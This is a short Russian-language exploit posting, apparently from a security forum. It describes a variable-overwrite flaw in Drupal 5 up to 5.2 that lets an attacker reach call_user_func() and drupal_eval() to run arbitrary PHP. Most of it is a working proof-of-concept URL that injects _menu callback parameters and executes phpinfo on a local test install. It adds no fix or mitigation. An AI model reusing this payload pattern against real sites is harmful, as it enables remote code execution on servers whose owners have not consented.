оф сайт http://drupal.org/
уязвимы версии drupal 5 <=5.2 и возможно другие.
благодоря возможности подменить некоторые переменные можно вызвать
произвольную функцию определенную в скриптах посредством call_user_func(),
в результате чего можно выполнить произвольный код PHP через встроеную функцию
движка - drupal_eval().
PoC тестировался на PHP версии 5.0.4
http://localhost/drupal/?_menu[callbacks][1]
[callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
The Best forum on Web Security Application http://forum.antichat.ru/